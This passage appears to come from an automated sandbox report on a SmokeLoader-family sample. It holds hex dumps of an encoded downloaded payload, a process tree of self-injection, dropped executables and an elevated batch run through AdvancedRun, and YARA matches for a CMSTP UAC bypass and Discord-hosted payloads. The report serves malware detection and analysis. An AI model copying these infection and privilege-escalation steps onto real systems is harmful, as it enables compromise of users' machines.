78 20 74 4f 20 78 20 74 6f 20
                                                  Data Ascii: K x OOR x kR x tQ x RR x Oxt x kk x kk x Oxo x RY x YO x OOO x OoO x Rt x OoO x Kk x Oxk x OxK x RR x tO x OoO x OOY x tk x OOY x OOE x Oxo x kE x OOO x tx x Yt x Qk x OOQ x YY x tK x Kt x ko x Qt x OOO x tR x Oxk x tK x kt x Qx x RY x OOo x Qk x tO x to
                                                  2021-10-29 18:30:03 UTC2908INData Raw: 20 78 20 51 6b 20 78 20 74 6b 20 78 20 4f 4f 52 20 78 20 4f 4f 6f 20 78 20 4f 78 6b 20 78 20 4b 74 20 78 20 74 59 20 78 20 4f 4f 4f 20 78 20 74 74 20 78 20 4f 4f 4f 20 78 20 6b 52 20 78 20 74 59 20 78 20 74 6b 20 78 20 74 59 20 78 20 4b 45 20 78 20 52 6b 20 78 20 4f 78 59 20 78 20 4f 6f 78 20 78 20 4f 78 6b 20 78 20 51 51 20 78 20 51 78 20 78 20 4f 78 78 20 78 20 4f 4f 52 20 78 20 74 6b 20 78 20 51 78 20 78 20 6b 6f 20 78 20 4f 4f 51 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 4f 20 78 20 52 4f 20 78 20 78 20 51 20 4b 52 20 78 20 4f 78 4f 20 78 20 4f 6f 78 20 78 20 4f 78 4f 20 78 20 78 20 4f 45 20 4f 6f 45 20 78 20 4b 6b 20 78 20 4f 6f 59 20 78 20 4f 6f 45 20 78 20 4b
                                                  Data Ascii: x Qk x tk x OOR x OOo x Oxk x Kt x tY x OOO x tt x OOO x kR x tY x tk x tY x KE x Rk x OxY x Oox x Oxk x QQ x Qx x Oxx x OOR x tk x Qx x ko x OOQ x RY x RY x RY x RY x RY x RY x RY x RY x RO x RO x x Q KR x OxO x Oox x OxO x x OE OoE x Kk x OoY x OoE x K
                                                  2021-10-29 18:30:03 UTC2924INData Raw: 20 4f 4f 4b 20 78 20 45 74 20 78 20 4f 4f 78 20 78 20 45 74 20 78 20 4f 78 51 20 78 20 4f 4f 59 20 78 20 51 6b 20 78 20 4f 4f 51 20 78 20 4f 6f 78 20 78 20 45 74 20 78 20 4f 78 6f 20 78 20 45 74 20 78 20 4f 78 78 20 78 20 4f 4f 45 20 78 20 4f 4f 4b 20 78 20 4f 78 45 20 78 20 4f 4f 4b 20 78 20 45 74 20 78 20 4f 78 59 20 78 20 45 74 20 78 20 4f 78 59 20 78 20 4f 4f 6b 20 78 20 4f 78 74 20 78 20 4f 4f 45 20 78 20 4f 4f 6f 20 78 20 4f 4f 6b 20 78 20 45 74 20 78 20 4f 78 45 20 78 20 45 74 20 78 20 4f 78 4b 20 78 20 4f 4f 59 20 78 20 4f 78 6b 20 78 20 4f 78 59 20 78 20 4f 4f 59 20 78 20 4f 4f 6b 20 78 20 4f 78 74 20 78 20 4f 4f 52 20 78 20 4f 4f 6b 20 78 20 4f 4f 4f 20 78 20 4f 78 6f 20 78 20 45 74 20 78 20 45 6f 20 78 20 45 74 20 78 20 51 51 20 78 20 4f 78 6f
                                                  Data Ascii: OOK x Et x OOx x Et x OxQ x OOY x Qk x OOQ x Oox x Et x Oxo x Et x Oxx x OOE x OOK x OxE x OOK x Et x OxY x Et x OxY x OOk x Oxt x OOE x OOo x OOk x Et x OxE x Et x OxK x OOY x Oxk x OxY x OOY x OOk x Oxt x OOR x OOk x OOO x Oxo x Et x Eo x Et x QQ x Oxo
                                                  2021-10-29 18:30:03 UTC2940INData Raw: 45 20 78 20 4f 4f 4f 20 78 20 4f 4f 6f 20 78 20 4f 6f 78 20 78 20 4f 4f 45 20 78 20 4f 4f 59 20 78 20 4f 78 45 20 78 20 4f 6f 78 20 78 20 4f 6f 6f 20 78 20 4f 6f 78 20 78 20 51 74 20 78 20 4f 4f 52 20 78 20 4f 78 45 20 78 20 45 74 20 78 20 4f 4f 52 20 78 20 45 74 20 78 20 4f 78 6b 20 78 20 4f 4f 59 20 78 20 51 51 20 78 20 4f 78 45 20 78 20 4f 78 78 20 78 20 4f 4f 52 20 78 20 4f 4f 51 20 78 20 4f 4f 4f 20 78 20 4f 78 59 20 78 20 51 6b 20 78 20 4f 4f 6f 20 78 20 4f 4f 45 20 78 20 4f 4f 59 20 78 20 45 74 20 78 20 51 74 20 78 20 45 74 20 78 20 4f 4f 51 20 78 20 4f 4f 78 20 78 20 4f 6f 6f 20 78 20 4f 4f 6f 20 78 20 4f 78 52 20 78 20 4f 4f 74 20 78 20 51 6b 20 78 20 4f 4f 6b 20 78 20 4f 78 4b 20 78 20 45 74 20 78 20 4f 4f 4b 20 78 20 45 74 20 78 20 4f 78 4f 20
                                                  Data Ascii: E x OOO x OOo x Oox x OOE x OOY x OxE x Oox x Ooo x Oox x Qt x OOR x OxE x Et x OOR x Et x Oxk x OOY x QQ x OxE x Oxx x OOR x OOQ x OOO x OxY x Qk x OOo x OOE x OOY x Et x Qt x Et x OOQ x OOx x Ooo x OOo x OxR x OOt x Qk x OOk x OxK x Et x OOK x Et x OxO
                                                  2021-10-29 18:30:03 UTC2956INData Raw: 20 78 20 4b 6b 20 78 20 4f 6f 59 20 78 20 51 6f 20 78 20 4f 4f 52 20 78 20 4f 78 4f 20 78 20 4f 4f 59 20 78 20 4f 4f 52 20 78 20 4b 52 20 78 20 51 6b 20 78 20 51 74 20 78 20 4f 4f 52 20 78 20 45 4b 20 78 20 45 6f 20 78 20 4b 74 20 78 20 6b 74 20 78 20 4f 78 59 20 78 20 4f 4f 78 20 78 20 4f 78 78 20 78 20 4f 4f 4f 20 78 20 4f 4f 51 20 78 20 6b 45 20 78 20 4f 4f 52 20 78 20 51 74 20 78 20 4f 4f 52 20 78 20 4f 78 4f 20 78 20 45 6f 20 78 20 45 4b 20 78 20 45 4b 20 78 20 4b 6b 20 78 20 45 4b 20 78 20 45 4b 20 78 20 45 6f 20 78 20 4b 74 20 78 20 6b 78 20 78 20 4f 4f 4b 20 78 20 4f 78 59 20 78 20 4f 4f 4f 20 78 20 4f 4f 4b 20 78 20 4f 78 59 20 78 20 4f 4f 52 20 78 20 4f 6f 4f 20 78 20 52 74 20 78 20 4f 78 6b 20 78 20 51 74 20 78 20 4f 4f 59 20 78 20 4f 4f 59 20
                                                  Data Ascii: x Kk x OoY x Qo x OOR x OxO x OOY x OOR x KR x Qk x Qt x OOR x EK x Eo x Kt x kt x OxY x OOx x Oxx x OOO x OOQ x kE x OOR x Qt x OOR x OxO x Eo x EK x EK x Kk x EK x EK x Eo x Kt x kx x OOK x OxY x OOO x OOK x OxY x OOR x OoO x Rt x Oxk x Qt x OOY x OOY
                                                  2021-10-29 18:30:03 UTC2972INData Raw: 20 78 20 6b 6f 20 78 20 59 4f 20 78 20 59 78 20 78 20 4b 52 20 78 20 52 51 20 78 20 6b 6b 20 78 20 52 51 20 78 20 45 4b 20 78 20 4b 4b 20 78 20 45 6f 20 78 20 45 4b 20 78 20 6b 78 20 78 20 4f 4f 4b 20 78 20 4f 4f 4f 20 78 20 4f 78 6f 20 78 20 4f 78 59 20 78 20 4f 78 6b 20 78 20 4f 78 4f 20 78 20 74 45 20 78 20 4f 4f 78 20 78 20 4f 4f 59 20 78 20 4f 4f 52 20 78 20 51 74 20 78 20 4f 78 6b 20 78 20 4f 78 6b 20 78 20 6b 78 20 78 20 51 74 20 78 20 4f 4f 52 20 78 20 4f 78 4b 20 78 20 45 4b 20 78 20 4b 4b 20 78 20 45 6f 20 78 20 45 4b 20 78 20 45 74 20 78 20 6b 59 20 78 20 4f 4f 78 20 78 20 4f 78 4f 20 78 20 4f 6f 78 20 78 20 4f 4f 6f 20 78 20 4f 78 4f 20 78 20 51 51 20 78 20 4f 4f 52 20 78 20 4f 78 4f 20 78 20 4f 78 78 20 78 20 52 51 20 78 20 4f 4f 4b 20 78 20
                                                  Data Ascii: x ko x YO x Yx x KR x RQ x kk x RQ x EK x KK x Eo x EK x kx x OOK x OOO x Oxo x OxY x Oxk x OxO x tE x OOx x OOY x OOR x Qt x Oxk x Oxk x kx x Qt x OOR x OxK x EK x KK x Eo x EK x Et x kY x OOx x OxO x Oox x OOo x OxO x QQ x OOR x OxO x Oxx x RQ x OOK x
                                                  2021-10-29 18:30:03 UTC2988INData Raw: 20 4f 4f 4f 20 78 20 4f 4f 4b 20 78 20 4f 78 4f 20 78 20 6b 6b 20 78 20 4b 52 20 78 20 4f 78 4f 20 78 20 4f 6f 78 20 78 20 4f 78 4f 20 78 20 78 20 78 20 78 20 78 20 59 6f 20 78 20 6b 20 78 20 4f 20 78 20 6b 78 20 78 20 4f 4f 4b 20 78 20 4f 4f 4f 20 78 20 4f 78 78 20 78 20 4f 4f 74 20 78 20 51 51 20 78 20 4f 4f 52 20 78 20 6b 52 20 78 20 4f 78 4f 20 78 20 4f 4f 4b 20 78 20 4f 4f 59 20 78 20 4f 78 59 20 78 20 4f 4f 4f 20 78 20 4f 4f 78 20 78 20 78 20 78 20 4b 6b 20 78 20 4b 52 20 78 20 4b 6b 20 78 20 4b 52 20 78 20 4b 6b 20 78 20 4b 52 20 78 20 4b 6b 20 78 20 78 20 78 20 59 52 20 78 20 6b 20 78 20 4f 20 78 20 52 59 20 78 20 4f 4f 59 20 78 20 4f 4f 59 20 78 20 4f 78 4f 20 78 20 4f 78 51 20 78 20 51 6b 20 78 20 4f 78 6b 20 78 20 4f 6f 4f 20 78 20 45 6f 20 78
                                                  Data Ascii: OOO x OOK x OxO x kk x KR x OxO x Oox x OxO x x x x x Yo x k x O x kx x OOK x OOO x Oxx x OOt x QQ x OOR x kR x OxO x OOK x OOY x OxY x OOO x OOx x x x Kk x KR x Kk x KR x Kk x KR x Kk x x x YR x k x O x RY x OOY x OOY x OxO x OxQ x Qk x Oxk x OoO x Eo x


                                                  Code Manipulations

                                                  Statistics

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Start time:20:28:34
                                                  Start date:29/10/2021
                                                  Path:C:\Users\user\Desktop\25Kf6vSBoq.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Users\user\Desktop\25Kf6vSBoq.exe'
                                                  Imagebase:0x400000
                                                  File size:344064 bytes
                                                  MD5 hash:3B947ED5AABDD775B1AFC31A5C4D39A0
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low

                                                  General

                                                  Start time:20:28:38
                                                  Start date:29/10/2021
                                                  Path:C:\Users\user\Desktop\25Kf6vSBoq.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Users\user\Desktop\25Kf6vSBoq.exe'
                                                  Imagebase:0x400000
                                                  File size:344064 bytes
                                                  MD5 hash:3B947ED5AABDD775B1AFC31A5C4D39A0
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000002.00000002.312112789.0000000002051000.00000004.00020000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000002.00000002.311815156.0000000000420000.00000004.00000001.sdmp, Author: Joe Security
                                                  Reputation:low

                                                  General

                                                  Start time:20:28:46
                                                  Start date:29/10/2021
                                                  Path:C:\Windows\explorer.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\Explorer.EXE
                                                  Imagebase:0x7ff662bf0000
                                                  File size:3933184 bytes
                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000000.296771196.0000000002871000.00000020.00020000.sdmp, Author: Joe Security
                                                  Reputation:high

                                                  General

                                                  Start time:20:29:22
                                                  Start date:29/10/2021
                                                  Path:C:\Users\user\AppData\Local\Temp\6EC5.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user~1\AppData\Local\Temp\6EC5.exe
                                                  Imagebase:0x400000
                                                  File size:344064 bytes
                                                  MD5 hash:3B947ED5AABDD775B1AFC31A5C4D39A0
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Antivirus matches:
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 45%, ReversingLabs
                                                  Reputation:low

                                                  General

                                                  Start time:20:29:22
                                                  Start date:29/10/2021
                                                  Path:C:\Users\user\AppData\Roaming\irjbuft
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\AppData\Roaming\irjbuft
                                                  Imagebase:0x400000
                                                  File size:344064 bytes
                                                  MD5 hash:3B947ED5AABDD775B1AFC31A5C4D39A0
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Antivirus matches:
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 45%, ReversingLabs
                                                  Reputation:low

                                                  General

                                                  Start time:20:29:31
                                                  Start date:29/10/2021
                                                  Path:C:\Users\user\AppData\Local\Temp\6EC5.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user~1\AppData\Local\Temp\6EC5.exe
                                                  Imagebase:0x400000
                                                  File size:344064 bytes
                                                  MD5 hash:3B947ED5AABDD775B1AFC31A5C4D39A0
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000F.00000002.382786562.0000000001F70000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000F.00000002.382804638.0000000001F91000.00000004.00020000.sdmp, Author: Joe Security
                                                  Reputation:low

                                                  General

                                                  Start time:20:29:35
                                                  Start date:29/10/2021
                                                  Path:C:\Users\user\AppData\Roaming\irjbuft
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\AppData\Roaming\irjbuft
                                                  Imagebase:0x400000
                                                  File size:344064 bytes
                                                  MD5 hash:3B947ED5AABDD775B1AFC31A5C4D39A0
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low

                                                  General

                                                  Start time:20:29:42
                                                  Start date:29/10/2021
                                                  Path:C:\Users\user\AppData\Local\Temp\B82B.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user~1\AppData\Local\Temp\B82B.exe
                                                  Imagebase:0x850000
                                                  File size:512512 bytes
                                                  MD5 hash:F57B28AEC65D4691202B9524F84CC54A
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000014.00000003.501647744.000000000666B000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\user\AppData\Local\Temp\B82B.exe, Author: Florian Roth
                                                  Antivirus matches:
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 39%, ReversingLabs
                                                  Reputation:low

                                                  General

                                                  Start time:20:29:45
                                                  Start date:29/10/2021
                                                  Path:C:\Users\user\AppData\Local\Temp\C1B2.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user~1\AppData\Local\Temp\C1B2.exe
                                                  Imagebase:0xe80000
                                                  File size:512952 bytes
                                                  MD5 hash:42758E2569239A774BECDB12698B124C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\user\AppData\Local\Temp\C1B2.exe, Author: Florian Roth
                                                  Antivirus matches:
                                                  • Detection: 100%, Joe Sandbox ML
                                                  Reputation:low

                                                  General

                                                  Start time:20:29:49
                                                  Start date:29/10/2021
                                                  Path:C:\Users\user\AppData\Local\Temp\CD0D.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user~1\AppData\Local\Temp\CD0D.exe
                                                  Imagebase:0x400000
                                                  File size:212992 bytes
                                                  MD5 hash:73252ACB344040DDC5D9CE78A5D3A4C2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000016.00000003.418065622.0000000002FC0000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000016.00000002.447688119.0000000004BA1000.00000004.00020000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000016.00000002.434655880.0000000003000000.00000004.00000001.sdmp, Author: Joe Security
                                                  Antivirus matches:
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 80%, ReversingLabs

                                                  General

                                                  Start time:20:29:52
                                                  Start date:29/10/2021
                                                  Path:C:\Users\user\AppData\Local\Temp\DF9C.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user~1\AppData\Local\Temp\DF9C.exe
                                                  Imagebase:0x460000
                                                  File size:859648 bytes
                                                  MD5 hash:AB823DF932B3C2941A9015848EBDB97B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML

                                                  General

                                                  Start time:20:29:55
                                                  Start date:29/10/2021
                                                  Path:C:\Users\user\AppData\Local\Temp\EA8A.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user~1\AppData\Local\Temp\EA8A.exe
                                                  Imagebase:0xfa0000
                                                  File size:161280 bytes
                                                  MD5 hash:9FA070AF1ED2E1F07ED8C9F6EB2BDD29
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\user\AppData\Local\Temp\EA8A.exe, Author: Florian Roth
                                                  Antivirus matches:
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 43%, ReversingLabs

                                                  General

                                                  Start time:20:29:56
                                                  Start date:29/10/2021
                                                  Path:C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                                                  Imagebase:0x400000
                                                  File size:91000 bytes
                                                  MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Antivirus matches:
                                                  • Detection: 3%, Metadefender, Browse
                                                  • Detection: 0%, ReversingLabs

                                                  General

                                                  Start time:20:29:58
                                                  Start date:29/10/2021
                                                  Path:C:\Users\user\AppData\Local\Temp\F4BC.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user~1\AppData\Local\Temp\F4BC.exe
                                                  Imagebase:0x400000
                                                  File size:347136 bytes
                                                  MD5 hash:31BE6099D31BDBF1ED339EFFDC1C7064
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000001C.00000002.462341902.0000000004791000.00000004.00020000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000001C.00000002.461574944.0000000002B80000.00000004.00000001.sdmp, Author: Joe Security
                                                  Antivirus matches:
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 57%, ReversingLabs

                                                  General

                                                  Start time:20:30:01
                                                  Start date:29/10/2021
                                                  Path:C:\Users\user\AppData\Local\Temp\DF9C.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:DF9C.exe
                                                  Imagebase:0x8a0000
                                                  File size:859648 bytes
                                                  MD5 hash:AB823DF932B3C2941A9015848EBDB97B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  Disassembly

                                                  Code Analysis

                                                  Reset < >